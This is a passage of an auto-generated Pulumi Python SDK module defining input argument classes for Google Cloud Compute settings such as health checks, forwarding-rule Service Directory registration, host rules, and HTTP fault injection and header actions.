Specifies a fixed number of VM instances. This must be a positive integer.
"""
return pulumi.get(self, "fixed")
@fixed.setter
def fixed(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fixed", value)
@property
@pulumi.getter
def percent(self) -> Optional[pulumi.Input[int]]:
"""
Specifies a percentage of instances between 0 to 100%, inclusive. For example, specify 80 for 80%.
"""
return pulumi.get(self, "percent")
@percent.setter
def percent(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "percent", value)
@pulumi.input_type
class ForwardingRuleServiceDirectoryRegistrationArgs:
def __init__(__self__, *,
namespace: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input[str]] = None,
service_directory_region: Optional[pulumi.Input[str]] = None):
"""
Describes the auto-registration of the Forwarding Rule to Service Directory. The region and project of the Service Directory resource generated from this registration will be the same as this Forwarding Rule.
:param pulumi.Input[str] namespace: Service Directory namespace to register the forwarding rule under.
:param pulumi.Input[str] service: Service Directory service to register the forwarding rule under.
:param pulumi.Input[str] service_directory_region: [Optional] Service Directory region to register this global forwarding rule under. Default to "us-central1". Only used for PSC for Google APIs. All PSC for Google APIs Forwarding Rules on the same network should use the same Service Directory region.
"""
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if service is not None:
pulumi.set(__self__, "service", service)
if service_directory_region is not None:
pulumi.set(__self__, "service_directory_region", service_directory_region)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
Service Directory namespace to register the forwarding rule under.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
Service Directory service to register the forwarding rule under.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="serviceDirectoryRegion")
def service_directory_region(self) -> Optional[pulumi.Input[str]]:
"""
[Optional] Service Directory region to register this global forwarding rule under. Default to "us-central1". Only used for PSC for Google APIs. All PSC for Google APIs Forwarding Rules on the same network should use the same Service Directory region.
"""
return pulumi.get(self, "service_directory_region")
@service_directory_region.setter
def service_directory_region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_directory_region", value)
@pulumi.input_type
class GRPCHealthCheckArgs:
def __init__(__self__, *,
grpc_service_name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['GRPCHealthCheckPortSpecification']] = None):
"""
:param pulumi.Input[str] grpc_service_name: The gRPC service name for the health check. This field is optional. The value of grpc_service_name has the following meanings by convention: - Empty service_name means the overall status of all services at the backend. - Non-empty service_name means the health of that gRPC service, as defined by the owner of the service. The grpc_service_name can only be ASCII.
:param pulumi.Input[int] port: The port number for the health check request. Must be specified if port_name and port_specification are not set or if port_specification is USE_FIXED_PORT. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence. The port_name should conform to RFC1035.
:param pulumi.Input['GRPCHealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, gRPC health check follows behavior specified in port and portName fields.
"""
if grpc_service_name is not None:
pulumi.set(__self__, "grpc_service_name", grpc_service_name)
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
@property
@pulumi.getter(name="grpcServiceName")
def grpc_service_name(self) -> Optional[pulumi.Input[str]]:
"""
The gRPC service name for the health check. This field is optional. The value of grpc_service_name has the following meanings by convention: - Empty service_name means the overall status of all services at the backend. - Non-empty service_name means the health of that gRPC service, as defined by the owner of the service. The grpc_service_name can only be ASCII.
"""
return pulumi.get(self, "grpc_service_name")
@grpc_service_name.setter
def grpc_service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "grpc_service_name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port number for the health check request. Must be specified if port_name and port_specification are not set or if port_specification is USE_FIXED_PORT. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence. The port_name should conform to RFC1035.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['GRPCHealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, gRPC health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['GRPCHealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@pulumi.input_type
class GuestOsFeatureArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['GuestOsFeatureType']] = None):
"""
Guest OS features.
:param pulumi.Input['GuestOsFeatureType'] type: The ID of a supported feature. To add multiple values, use commas to separate values. Set to one or more of the following values: - VIRTIO_SCSI_MULTIQUEUE - WINDOWS - MULTI_IP_SUBNET - UEFI_COMPATIBLE - SECURE_BOOT - GVNIC - SEV_CAPABLE - SUSPEND_RESUME_COMPATIBLE For more information, see Enabling guest operating system features.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['GuestOsFeatureType']]:
"""
The ID of a supported feature. To add multiple values, use commas to separate values. Set to one or more of the following values: - VIRTIO_SCSI_MULTIQUEUE - WINDOWS - MULTI_IP_SUBNET - UEFI_COMPATIBLE - SECURE_BOOT - GVNIC - SEV_CAPABLE - SUSPEND_RESUME_COMPATIBLE For more information, see Enabling guest operating system features.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['GuestOsFeatureType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class HTTP2HealthCheckArgs:
def __init__(__self__, *,
host: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['HTTP2HealthCheckPortSpecification']] = None,
proxy_header: Optional[pulumi.Input['HTTP2HealthCheckProxyHeader']] = None,
request_path: Optional[pulumi.Input[str]] = None,
response: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] host: The value of the host header in the HTTP/2 health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
:param pulumi.Input[int] port: The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
:param pulumi.Input['HTTP2HealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTP2 health check follows behavior specified in port and portName fields.
:param pulumi.Input['HTTP2HealthCheckProxyHeader'] proxy_header: Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
:param pulumi.Input[str] request_path: The request path of the HTTP/2 health check request. The default value is /.
:param pulumi.Input[str] response: The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
if host is not None:
pulumi.set(__self__, "host", host)
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
if proxy_header is not None:
pulumi.set(__self__, "proxy_header", proxy_header)
if request_path is not None:
pulumi.set(__self__, "request_path", request_path)
if response is not None:
pulumi.set(__self__, "response", response)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The value of the host header in the HTTP/2 health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['HTTP2HealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTP2 health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['HTTP2HealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@property
@pulumi.getter(name="proxyHeader")
def proxy_header(self) -> Optional[pulumi.Input['HTTP2HealthCheckProxyHeader']]:
"""
Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
"""
return pulumi.get(self, "proxy_header")
@proxy_header.setter
def proxy_header(self, value: Optional[pulumi.Input['HTTP2HealthCheckProxyHeader']]):
pulumi.set(self, "proxy_header", value)
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> Optional[pulumi.Input[str]]:
"""
The request path of the HTTP/2 health check request. The default value is /.
"""
return pulumi.get(self, "request_path")
@request_path.setter
def request_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_path", value)
@property
@pulumi.getter
def response(self) -> Optional[pulumi.Input[str]]:
"""
The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
return pulumi.get(self, "response")
@response.setter
def response(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response", value)
@pulumi.input_type
class HTTPHealthCheckArgs:
def __init__(__self__, *,
host: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['HTTPHealthCheckPortSpecification']] = None,
proxy_header: Optional[pulumi.Input['HTTPHealthCheckProxyHeader']] = None,
request_path: Optional[pulumi.Input[str]] = None,
response: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] host: The value of the host header in the HTTP health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
:param pulumi.Input[int] port: The TCP port number for the health check request. The default value is 80. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
:param pulumi.Input['HTTPHealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTP health check follows behavior specified in port and portName fields.
:param pulumi.Input['HTTPHealthCheckProxyHeader'] proxy_header: Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
:param pulumi.Input[str] request_path: The request path of the HTTP health check request. The default value is /.
:param pulumi.Input[str] response: The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
if host is not None:
pulumi.set(__self__, "host", host)
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
if proxy_header is not None:
pulumi.set(__self__, "proxy_header", proxy_header)
if request_path is not None:
pulumi.set(__self__, "request_path", request_path)
if response is not None:
pulumi.set(__self__, "response", response)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The value of the host header in the HTTP health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The TCP port number for the health check request. The default value is 80. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['HTTPHealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTP health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['HTTPHealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@property
@pulumi.getter(name="proxyHeader")
def proxy_header(self) -> Optional[pulumi.Input['HTTPHealthCheckProxyHeader']]:
"""
Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
"""
return pulumi.get(self, "proxy_header")
@proxy_header.setter
def proxy_header(self, value: Optional[pulumi.Input['HTTPHealthCheckProxyHeader']]):
pulumi.set(self, "proxy_header", value)
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> Optional[pulumi.Input[str]]:
"""
The request path of the HTTP health check request. The default value is /.
"""
return pulumi.get(self, "request_path")
@request_path.setter
def request_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_path", value)
@property
@pulumi.getter
def response(self) -> Optional[pulumi.Input[str]]:
"""
The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
return pulumi.get(self, "response")
@response.setter
def response(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response", value)
@pulumi.input_type
class HTTPSHealthCheckArgs:
def __init__(__self__, *,
host: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['HTTPSHealthCheckPortSpecification']] = None,
proxy_header: Optional[pulumi.Input['HTTPSHealthCheckProxyHeader']] = None,
request_path: Optional[pulumi.Input[str]] = None,
response: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] host: The value of the host header in the HTTPS health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
:param pulumi.Input[int] port: The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
:param pulumi.Input['HTTPSHealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTPS health check follows behavior specified in port and portName fields.
:param pulumi.Input['HTTPSHealthCheckProxyHeader'] proxy_header: Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
:param pulumi.Input[str] request_path: The request path of the HTTPS health check request. The default value is /.
:param pulumi.Input[str] response: The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
if host is not None:
pulumi.set(__self__, "host", host)
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
if proxy_header is not None:
pulumi.set(__self__, "proxy_header", proxy_header)
if request_path is not None:
pulumi.set(__self__, "request_path", request_path)
if response is not None:
pulumi.set(__self__, "response", response)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The value of the host header in the HTTPS health check request. If left empty (default value), the IP on behalf of which this health check is performed will be used.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['HTTPSHealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, HTTPS health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['HTTPSHealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@property
@pulumi.getter(name="proxyHeader")
def proxy_header(self) -> Optional[pulumi.Input['HTTPSHealthCheckProxyHeader']]:
"""
Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
"""
return pulumi.get(self, "proxy_header")
@proxy_header.setter
def proxy_header(self, value: Optional[pulumi.Input['HTTPSHealthCheckProxyHeader']]):
pulumi.set(self, "proxy_header", value)
@property
@pulumi.getter(name="requestPath")
def request_path(self) -> Optional[pulumi.Input[str]]:
"""
The request path of the HTTPS health check request. The default value is /.
"""
return pulumi.get(self, "request_path")
@request_path.setter
def request_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_path", value)
@property
@pulumi.getter
def response(self) -> Optional[pulumi.Input[str]]:
"""
The string to match anywhere in the first 1024 bytes of the response body. If left empty (the default value), the status code determines health. The response data can only be ASCII.
"""
return pulumi.get(self, "response")
@response.setter
def response(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response", value)
@pulumi.input_type
class HealthCheckLogConfigArgs:
def __init__(__self__, *,
enable: Optional[pulumi.Input[bool]] = None):
"""
Configuration of logging on a health check. If logging is enabled, logs will be exported to Stackdriver.
:param pulumi.Input[bool] enable: Indicates whether or not to export logs. This is false by default, which means no health check logging will be done.
"""
if enable is not None:
pulumi.set(__self__, "enable", enable)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether or not to export logs. This is false by default, which means no health check logging will be done.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@pulumi.input_type
class HostRuleArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
path_matcher: Optional[pulumi.Input[str]] = None):
"""
UrlMaps A host-matching rule for a URL. If matched, will use the named PathMatcher to select the BackendService.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] hosts: The list of host patterns to match. They must be valid hostnames with optional port numbers in the format host:port. * matches any string of ([a-z0-9-.]*). In that case, * must be the first character and must be followed in the pattern by either - or .. * based matching is not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
:param pulumi.Input[str] path_matcher: The name of the PathMatcher to use to match the path portion of the URL if the hostRule matches the URL's host portion.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if hosts is not None:
pulumi.set(__self__, "hosts", hosts)
if path_matcher is not None:
pulumi.set(__self__, "path_matcher", path_matcher)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def hosts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of host patterns to match. They must be valid hostnames with optional port numbers in the format host:port. * matches any string of ([a-z0-9-.]*). In that case, * must be the first character and must be followed in the pattern by either - or .. * based matching is not supported when the URL map is bound to a target gRPC proxy that has the validateForProxyless field set to true.
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter(name="pathMatcher")
def path_matcher(self) -> Optional[pulumi.Input[str]]:
"""
The name of the PathMatcher to use to match the path portion of the URL if the hostRule matches the URL's host portion.
"""
return pulumi.get(self, "path_matcher")
@path_matcher.setter
def path_matcher(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path_matcher", value)
@pulumi.input_type
class HttpFaultAbortArgs:
def __init__(__self__, *,
http_status: Optional[pulumi.Input[int]] = None,
percentage: Optional[pulumi.Input[float]] = None):
"""
Specification for how requests are aborted as part of fault injection.
:param pulumi.Input[int] http_status: The HTTP status code used to abort the request. The value must be from 200 to 599 inclusive. For gRPC protocol, the gRPC status code is mapped to HTTP status code according to this mapping table. HTTP status 200 is mapped to gRPC status UNKNOWN. Injecting an OK status is currently not supported by Traffic Director.
:param pulumi.Input[float] percentage: The percentage of traffic for connections, operations, or requests that is aborted as part of fault injection. The value must be from 0.0 to 100.0 inclusive.
"""
if http_status is not None:
pulumi.set(__self__, "http_status", http_status)
if percentage is not None:
pulumi.set(__self__, "percentage", percentage)
@property
@pulumi.getter(name="httpStatus")
def http_status(self) -> Optional[pulumi.Input[int]]:
"""
The HTTP status code used to abort the request. The value must be from 200 to 599 inclusive. For gRPC protocol, the gRPC status code is mapped to HTTP status code according to this mapping table. HTTP status 200 is mapped to gRPC status UNKNOWN. Injecting an OK status is currently not supported by Traffic Director.
"""
return pulumi.get(self, "http_status")
@http_status.setter
def http_status(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_status", value)
@property
@pulumi.getter
def percentage(self) -> Optional[pulumi.Input[float]]:
"""
The percentage of traffic for connections, operations, or requests that is aborted as part of fault injection. The value must be from 0.0 to 100.0 inclusive.
"""
return pulumi.get(self, "percentage")
@percentage.setter
def percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "percentage", value)
@pulumi.input_type
class HttpFaultDelayArgs:
def __init__(__self__, *,
fixed_delay: Optional[pulumi.Input['DurationArgs']] = None,
percentage: Optional[pulumi.Input[float]] = None):
"""
Specifies the delay introduced by the load balancer before forwarding the request to the backend service as part of fault injection.
:param pulumi.Input['DurationArgs'] fixed_delay: Specifies the value of the fixed delay interval.
:param pulumi.Input[float] percentage: The percentage of traffic for connections, operations, or requests for which a delay is introduced as part of fault injection. The value must be from 0.0 to 100.0 inclusive.
"""
if fixed_delay is not None:
pulumi.set(__self__, "fixed_delay", fixed_delay)
if percentage is not None:
pulumi.set(__self__, "percentage", percentage)
@property
@pulumi.getter(name="fixedDelay")
def fixed_delay(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Specifies the value of the fixed delay interval.
"""
return pulumi.get(self, "fixed_delay")
@fixed_delay.setter
def fixed_delay(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "fixed_delay", value)
@property
@pulumi.getter
def percentage(self) -> Optional[pulumi.Input[float]]:
"""
The percentage of traffic for connections, operations, or requests for which a delay is introduced as part of fault injection. The value must be from 0.0 to 100.0 inclusive.
"""
return pulumi.get(self, "percentage")
@percentage.setter
def percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "percentage", value)
@pulumi.input_type
class HttpFaultInjectionArgs:
def __init__(__self__, *,
abort: Optional[pulumi.Input['HttpFaultAbortArgs']] = None,
delay: Optional[pulumi.Input['HttpFaultDelayArgs']] = None):
"""
The specification for fault injection introduced into traffic to test the resiliency of clients to backend service failure. As part of fault injection, when clients send requests to a backend service, delays can be introduced by the load balancer on a percentage of requests before sending those request to the backend service. Similarly requests from clients can be aborted by the load balancer for a percentage of requests.
:param pulumi.Input['HttpFaultAbortArgs'] abort: The specification for how client requests are aborted as part of fault injection.
:param pulumi.Input['HttpFaultDelayArgs'] delay: The specification for how client requests are delayed as part of fault injection, before being sent to a backend service.
"""
if abort is not None:
pulumi.set(__self__, "abort", abort)
if delay is not None:
pulumi.set(__self__, "delay", delay)
@property
@pulumi.getter
def abort(self) -> Optional[pulumi.Input['HttpFaultAbortArgs']]:
"""
The specification for how client requests are aborted as part of fault injection.
"""
return pulumi.get(self, "abort")
@abort.setter
def abort(self, value: Optional[pulumi.Input['HttpFaultAbortArgs']]):
pulumi.set(self, "abort", value)
@property
@pulumi.getter
def delay(self) -> Optional[pulumi.Input['HttpFaultDelayArgs']]:
"""
The specification for how client requests are delayed as part of fault injection, before being sent to a backend service.
"""
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[pulumi.Input['HttpFaultDelayArgs']]):
pulumi.set(self, "delay", value)
@pulumi.input_type
class HttpFilterConfigArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input[str]] = None,
config_type_url: Optional[pulumi.Input[str]] = None,
filter_name: Optional[pulumi.Input[str]] = None):
"""
HttpFilterConfiguration supplies additional contextual settings for networkservices.HttpFilter resources enabled by Traffic Director.
:param pulumi.Input[str] config: The configuration needed to enable the networkservices.HttpFilter resource. The configuration must be YAML formatted and only contain fields defined in the protobuf identified in configTypeUrl
:param pulumi.Input[str] config_type_url: The fully qualified versioned proto3 type url of the protobuf that the filter expects for its contextual settings, for example: type.googleapis.com/google.protobuf.Struct
:param pulumi.Input[str] filter_name: Name of the networkservices.HttpFilter resource this configuration belongs to. This name must be known to the xDS client. Example: envoy.wasm
"""
if config is not None:
pulumi.set(__self__, "config", config)
if config_type_url is not None:
pulumi.set(__self__, "config_type_url", config_type_url)
if filter_name is not None:
pulumi.set(__self__, "filter_name", filter_name)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[str]]:
"""
The configuration needed to enable the networkservices.HttpFilter resource. The configuration must be YAML formatted and only contain fields defined in the protobuf identified in configTypeUrl
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter(name="configTypeUrl")
def config_type_url(self) -> Optional[pulumi.Input[str]]:
"""
The fully qualified versioned proto3 type url of the protobuf that the filter expects for its contextual settings, for example: type.googleapis.com/google.protobuf.Struct
"""
return pulumi.get(self, "config_type_url")
@config_type_url.setter
def config_type_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config_type_url", value)
@property
@pulumi.getter(name="filterName")
def filter_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the networkservices.HttpFilter resource this configuration belongs to. This name must be known to the xDS client. Example: envoy.wasm
"""
return pulumi.get(self, "filter_name")
@filter_name.setter
def filter_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_name", value)
@pulumi.input_type
class HttpHeaderActionArgs:
def __init__(__self__, *,
request_headers_to_add: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]] = None,
request_headers_to_remove: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
response_headers_to_add: Optional[pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]]] = None,
response_headers_to_remove: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The request and response header transformations that take effect before the request is passed along to the selected backendService.
:param pulumi.Input[Sequence[pulumi.Input['HttpHeaderOptionArgs']]] request_headers_to_add: Headers to add to a matching request before forwarding the request to the backendService.
:param pulumi.Input[Sequence[pulumi.Input[str]]] request_headers_to_remove: A list of header names for headers that need to be removed from the request before forwarding the request to the backendService.
